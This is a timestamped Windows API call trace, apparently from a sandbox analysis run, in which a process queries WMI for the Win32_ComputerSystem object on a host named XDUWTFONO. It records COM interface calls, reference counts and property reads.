	[0211.642] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x1c68c830*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c810 | out: ppvObject=0x1c68c810*=0x1cc40798) returned 0x0
	[0211.642] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x2
	[0211.642] IUnknown:AddRef (This=0x1cc40798) returned 0x3
	[0211.642] IEnumWbemClassObject:Clone (in: This=0x1cc40798, ppEnum=0x1c68cc70 | out: ppEnum=0x1c68cc70*=0x1cc408e8) returned 0x0
	[0211.644] IUnknown:QueryInterface (in: This=0x1cc408e8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c8c8 | out: ppvObject=0x1c68c8c8*=0x1cc408f0) returned 0x0
	[0211.644] IClientSecurity:QueryBlanket (in: This=0x1cc408f0, pProxy=0x1cc408e8, pAuthnSvc=0x1c68c8c0, pAuthzSvc=0x1c68c8bc, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8, pImpLevel=0x1c68c8d4, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0 | out: pAuthnSvc=0x1c68c8c0*=0xa, pAuthzSvc=0x1c68c8bc*=0x0, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8*=0x6, pImpLevel=0x1c68c8d4*=0x2, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0*=0x1) returned 0x0
	[0211.644] IUnknown:Release (This=0x1cc408f0) returned 0x1
	[0211.644] IUnknown:QueryInterface (in: This=0x1cc408e8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c868 | out: ppvObject=0x1c68c868*=0x1b86efe0) returned 0x0
	[0211.644] IUnknown:QueryInterface (in: This=0x1cc408e8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7f8 | out: ppvObject=0x1c68c7f8*=0x1cc408f0) returned 0x0
	[0211.644] IClientSecurity:SetBlanket (This=0x1cc408f0, pProxy=0x1cc408e8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0211.646] IUnknown:Release (This=0x1cc408f0) returned 0x2
	[0211.646] WbemLocator:IUnknown:Release (This=0x1b86efe0) returned 0x1
	[0211.646] CoTaskMemFree (pv=0x1b885950) 
	[0211.646] IUnknown:QueryInterface (in: This=0x1cc408e8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c490 | out: ppvObject=0x1c68c490*=0x1b86efe0) returned 0x0
	[0211.647] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86efe0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c510 | out: ppvObject=0x1c68c510*=0x0) returned 0x80004002
	[0211.647] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86efe0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c2a8 | out: ppvObject=0x1c68c2a8*=0x0) returned 0x80004002
	[0211.648] WbemLocator:IUnknown:AddRef (This=0x1b86efe0) returned 0x3
	[0211.648] CoGetContextToken (in: pToken=0x1c68c160 | out: pToken=0x1c68c160) returned 0x0
	[0211.648] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86efe0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c120 | out: ppvObject=0x1c68c120*=0x1b86eec8) returned 0x0
	[0211.648] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86eec8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c150 | out: pCid=0x1c68c150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0211.648] WbemLocator:IUnknown:Release (This=0x1b86eec8) returned 0x3
	[0211.649] CoGetContextToken (in: pToken=0x1c68c130 | out: pToken=0x1c68c130) returned 0x0
	[0211.649] WbemLocator:IUnknown:AddRef (This=0x1b86efe0) returned 0x4
	[0211.649] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86efe0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c248 | out: ppvObject=0x1c68c248*=0x1b86efb0) returned 0x0
	[0211.649] WbemLocator:IUnknown:Release (This=0x1b86efe0) returned 0x4
	[0211.649] WbemLocator:IRpcOptions:Query (in: This=0x1b86efb0, pPrx=0x1b86efe0, dwProperty=2, pdwValue=0x1c68c2b8 | out: pdwValue=0x1c68c2b8) returned 0x80004002
	[0211.649] WbemLocator:IUnknown:Release (This=0x1b86efb0) returned 0x3
	[0211.649] WbemLocator:IUnknown:Release (This=0x1b86efe0) returned 0x2
	[0211.649] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0211.649] CoGetContextToken (in: pToken=0x1c68c570 | out: pToken=0x1c68c570) returned 0x0
	[0211.649] WbemLocator:IUnknown:AddRef (This=0x1b86efe0) returned 0x3
	[0211.650] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86efe0, riid=0x1c68c6b0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c690 | out: ppvObject=0x1c68c690*=0x1cc408e8) returned 0x0
	[0211.650] WbemLocator:IUnknown:Release (This=0x1b86efe0) returned 0x3
	[0211.650] IUnknown:Release (This=0x1cc408e8) returned 0x2
	[0211.650] IUnknown:Release (This=0x1cc408e8) returned 0x1
	[0211.650] IUnknown:Release (This=0x1cc40798) returned 0x2
	[0211.650] CoGetContextToken (in: pToken=0x1c68ca30 | out: pToken=0x1c68ca30) returned 0x0
	[0211.650] CoGetContextToken (in: pToken=0x1c68c970 | out: pToken=0x1c68c970) returned 0x0
	[0211.650] WbemLocator:IUnknown:AddRef (This=0x1b86efe0) returned 0x2
	[0211.650] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86efe0, riid=0x1c68cab0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68ca90 | out: ppvObject=0x1c68ca90*=0x1cc408e8) returned 0x0
	[0211.651] WbemLocator:IUnknown:Release (This=0x1b86efe0) returned 0x2
	[0211.651] IUnknown:AddRef (This=0x1cc408e8) returned 0x3
	[0211.651] IEnumWbemClassObject:Reset (This=0x1cc408e8) returned 0x0
	[0211.652] IUnknown:Release (This=0x1cc408e8) returned 0x2
	[0211.652] CoTaskMemAlloc (cb=0x8) returned 0x1b88d4d0
	[0211.652] IEnumWbemClassObject:Next (in: This=0x1cc408e8, lTimeout=-1, uCount=0x1, apObjects=0x1b88d4d0, puReturned=0x1c68ccb8 | out: apObjects=0x1b88d4d0*=0x1cc40950, puReturned=0x1c68ccb8*=0x1) returned 0x0
	[0211.655] IUnknown:QueryInterface (in: This=0x1cc40950, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bfe0 | out: ppvObject=0x1c68bfe0*=0x1cc40950) returned 0x0
	[0211.655] IUnknown:QueryInterface (in: This=0x1cc40950, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c060 | out: ppvObject=0x1c68c060*=0x0) returned 0x80004002
	[0211.655] IUnknown:QueryInterface (in: This=0x1cc40950, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bdf8 | out: ppvObject=0x1c68bdf8*=0x0) returned 0x80004002
	[0211.656] IUnknown:AddRef (This=0x1cc40950) returned 0x3
	[0211.656] CoGetContextToken (in: pToken=0x1c68bcb0 | out: pToken=0x1c68bcb0) returned 0x0
	[0211.656] IUnknown:QueryInterface (in: This=0x1cc40950, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bc70 | out: ppvObject=0x1c68bc70*=0x1cc40958) returned 0x0
	[0211.656] IMarshal:GetUnmarshalClass (in: This=0x1cc40958, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bca0 | out: pCid=0x1c68bca0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0211.656] IUnknown:Release (This=0x1cc40958) returned 0x3
	[0211.656] CoGetContextToken (in: pToken=0x1c68bc80 | out: pToken=0x1c68bc80) returned 0x0
	[0211.656] IUnknown:AddRef (This=0x1cc40950) returned 0x4
	[0211.657] IUnknown:QueryInterface (in: This=0x1cc40950, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bd98 | out: ppvObject=0x1c68bd98*=0x0) returned 0x80004002
	[0211.657] IUnknown:Release (This=0x1cc40950) returned 0x3
	[0211.657] IUnknown:Release (This=0x1cc40950) returned 0x2
	[0211.657] CoGetContextToken (in: pToken=0x1c68c140 | out: pToken=0x1c68c140) returned 0x0
	[0211.657] CoGetContextToken (in: pToken=0x1c68c080 | out: pToken=0x1c68c080) returned 0x0
	[0211.657] IUnknown:AddRef (This=0x1cc40950) returned 0x3
	[0211.657] IUnknown:QueryInterface (in: This=0x1cc40950, riid=0x1c68c1c0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c1a0 | out: ppvObject=0x1c68c1a0*=0x1cc40950) returned 0x0
	[0211.657] IUnknown:Release (This=0x1cc40950) returned 0x3
	[0211.657] IUnknown:Release (This=0x1cc40950) returned 0x2
	[0211.658] IUnknown:Release (This=0x1cc40950) returned 0x1
	[0211.658] CoTaskMemFree (pv=0x1b88d4d0) 
	[0211.658] CoGetContextToken (in: pToken=0x1c68cac0 | out: pToken=0x1c68cac0) returned 0x0
	[0211.658] IUnknown:AddRef (This=0x1cc40950) returned 0x2
	[0211.658] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__GENUS", lFlags=0, pVal=0x1c68cc30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cc2c*=0, plFlavor=0x1c68cc28*=0 | out: pVal=0x1c68cc30*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68cc2c*=3, plFlavor=0x1c68cc28*=64) returned 0x0
	[0211.658] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__PATH", lFlags=0, pVal=0x1c68cbd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cbcc*=0, plFlavor=0x1c68cbc8*=0 | out: pVal=0x1c68cbd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c68cbcc*=8, plFlavor=0x1c68cbc8*=64) returned 0x0
	[0211.658] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0211.658] CoGetObjectContext (in: riid=0x1c68cb68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb60 | out: ppv=0x1c68cb60*=0x221868) returned 0x0
	[0211.659] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cb80 | out: pAptType=0x1c68cb80*=1) returned 0x0
	[0211.659] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cc88 | out: ppvObject=0x1c68cc88*=0x0) returned 0x80004002
	[0211.659] IUnknown:Release (This=0x221868) returned 0x1
	[0211.659] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c1f0 | out: ppv=0x1c68c1f0*=0x1cc31de0) returned 0x0
	[0211.660] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc31de0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf00 | out: ppvObject=0x1c68bf00*=0x0) returned 0x80004002
	[0211.660] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc31de0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bee8 | out: ppvObject=0x1c68bee8*=0x1cc42090) returned 0x0
	[0211.660] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc42090, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bdf0 | out: ppvObject=0x1c68bdf0*=0x1cc42090) returned 0x0
	[0211.660] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc42090, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68be70 | out: ppvObject=0x1c68be70*=0x0) returned 0x80004002
	[0211.661] WbemDefPath:IUnknown:AddRef (This=0x1cc42090) returned 0x3
	[0211.661] CoGetContextToken (in: pToken=0x1c68bac0 | out: pToken=0x1c68bac0) returned 0x0
	[0211.661] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc42090, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68ba80 | out: ppvObject=0x1c68ba80*=0x1b893330) returned 0x0
	[0211.661] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b893330, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bab0 | out: pCid=0x1c68bab0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0211.661] WbemDefPath:IUnknown:Release (This=0x1b893330) returned 0x3
	[0211.662] CoGetContextToken (in: pToken=0x1c68ba90 | out: pToken=0x1c68ba90) returned 0x0
	[0211.662] WbemDefPath:IUnknown:AddRef (This=0x1cc42090) returned 0x4
	[0211.662] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc42090, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bba8 | out: ppvObject=0x1c68bba8*=0x0) returned 0x80004002
	[0211.662] WbemDefPath:IUnknown:Release (This=0x1cc42090) returned 0x3
	[0211.662] WbemDefPath:IUnknown:Release (This=0x1cc42090) returned 0x2
	[0211.662] WbemDefPath:IUnknown:Release (This=0x1cc31de0) returned 0x0
	[0211.662] WbemDefPath:IUnknown:Release (This=0x1cc42090) returned 0x1
	[0211.662] CoGetContextToken (in: pToken=0x1c68c7c0 | out: pToken=0x1c68c7c0) returned 0x0
	[0211.662] CoGetContextToken (in: pToken=0x1c68c700 | out: pToken=0x1c68c700) returned 0x0
	[0211.662] WbemDefPath:IUnknown:AddRef (This=0x1cc42090) returned 0x2
	[0211.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc42090, riid=0x1c68c840*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c820 | out: ppvObject=0x1c68c820*=0x1cc42090) returned 0x0
	[0211.663] WbemDefPath:IUnknown:Release (This=0x1cc42090) returned 0x2
	[0211.663] WbemDefPath:IUnknown:Release (This=0x1cc42090) returned 0x1
	[0211.663] CoGetContextToken (in: pToken=0x1c68c940 | out: pToken=0x1c68c940) returned 0x0
	[0211.663] CoGetContextToken (in: pToken=0x1c68c880 | out: pToken=0x1c68c880) returned 0x0
	[0211.663] WbemDefPath:IUnknown:AddRef (This=0x1cc42090) returned 0x2
	[0211.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc42090, riid=0x1c68c9c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9a0 | out: ppvObject=0x1c68c9a0*=0x1cc42090) returned 0x0
	[0211.663] WbemDefPath:IUnknown:Release (This=0x1cc42090) returned 0x2
	[0211.664] WbemDefPath:IUnknown:AddRef (This=0x1cc42090) returned 0x3
	[0211.664] WbemDefPath:IWbemPath:SetText (This=0x1cc42090, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0211.664] WbemDefPath:IUnknown:Release (This=0x1cc42090) returned 0x2
	[0211.664] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc3dcd0, puCount=0x1c68cc00 | out: puCount=0x1c68cc00*=0x2) returned 0x0
	[0211.664] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cc00*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc00*=0x17, pszText=0x0) returned 0x0
	[0211.664] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cc00*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc00*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.664] CoTaskMemAlloc (cb=0x8) returned 0x1b88d4d0
	[0211.664] IEnumWbemClassObject:Next (in: This=0x1cc408e8, lTimeout=-1, uCount=0x1, apObjects=0x1b88d4d0, puReturned=0x1c68ccb8 | out: apObjects=0x1b88d4d0*=0x0, puReturned=0x1c68ccb8*=0x0) returned 0x1
	[0211.790] CoTaskMemFree (pv=0x1b88d4d0) 
	[0211.790] CoGetContextToken (in: pToken=0x1c68ca40 | out: pToken=0x1c68ca40) returned 0x0
	[0211.791] WbemLocator:IUnknown:Release (This=0x1b86efe0) returned 0x1
	[0211.791] IUnknown:Release (This=0x1cc408e8) returned 0x0
	[0211.794] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc3dcd0, puCount=0x1c68cd60 | out: puCount=0x1c68cd60*=0x2) returned 0x0
	[0211.794] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd60*=0x17, pszText=0x0) returned 0x0
	[0211.794] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.794] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cd50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd4c*=0, plFlavor=0x1c68cd48*=0 | out: pVal=0x1c68cd50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68cd4c*=8, plFlavor=0x1c68cd48*=64) returned 0x0
	[0211.794] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0211.794] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64 | out: pVal=0x1c68cd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64) returned 0x0
	[0211.794] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0211.794] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc3dcd0, puCount=0x1c68cd60 | out: puCount=0x1c68cd60*=0x2) returned 0x0
	[0211.794] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd60*=0x17, pszText=0x0) returned 0x0
	[0211.794] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.795] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__CLASS", lFlags=0, pVal=0x1c68cd50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd4c*=0, plFlavor=0x1c68cd48*=0 | out: pVal=0x1c68cd50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c68cd4c*=8, plFlavor=0x1c68cd48*=64) returned 0x0
	[0211.795] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0211.795] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__CLASS", lFlags=0, pVal=0x1c68cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64 | out: pVal=0x1c68cd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64) returned 0x0
	[0211.795] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0211.795] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc3dcd0, puCount=0x1c68ccf0 | out: puCount=0x1c68ccf0*=0x2) returned 0x0
	[0211.795] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68ccf0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68ccf0*=0x17, pszText=0x0) returned 0x0
	[0211.795] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68ccf0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68ccf0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.795] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc3dcd0, puCount=0x1c68ccf0 | out: puCount=0x1c68ccf0*=0x2) returned 0x0
	[0211.795] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68ccf0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68ccf0*=0x17, pszText=0x0) returned 0x0
	[0211.795] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68ccf0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68ccf0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.795] IWbemClassObject:GetNames (in: This=0x1cc40950, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c68cce8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c68cce0 | out: pNames=0x1c68cce0*="\x01ƀ\x08") returned 0x0
	[0211.796] SafeArrayGetDim (psa=0x1b88bbd0) returned 0x1
	[0211.796] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__GENUS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68ccdc*=3, plFlavor=0x1c68ccd8*=64) returned 0x0
